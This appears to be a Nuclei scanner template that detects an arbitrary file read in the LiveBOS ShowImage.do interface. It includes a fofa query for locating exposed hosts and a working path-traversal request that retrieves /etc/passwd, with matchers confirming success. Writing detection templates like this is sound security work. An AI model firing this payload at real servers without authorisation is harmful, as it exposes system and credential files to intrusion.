35 lines
1.1 KiB
YAML
35 lines
1.1 KiB
YAML
id: livebos-file-read
|
|
|
|
info:
|
|
name: LiveBOS ShowImage.do - Arbitrary File Read
|
|
author: yusakie
|
|
severity: high
|
|
description: |
|
|
An arbitrary file read vulnerability exists in the LiveBOS ShowImage.do interface, which can be exploited to obtain sensitive files from the server.
|
|
reference:
|
|
- https://www.wevul.com/2301.html
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 2
|
|
fofa-query: app="LiveBOS-框架" && body="管理控制台"
|
|
tags: livebos,lfi
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
GET /feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains(body_1, "Power by LiveBOS")
|
|
- regex('root:.*:0', body_2)
|
|
- status_code_2 == 200
|
|
condition: and
|
|
|
|
# digest: 4a0a00473045022052e0789e593dcbe4e86aec8e328934880655845e4f1c72376c3e48226e2c6f2a022100ae02e69172e16ab8fd1ebcf966fe6310d28247aa1b23e60e25ee144dbf091fa4:922c64590222798bb761d5b6d8e72950
|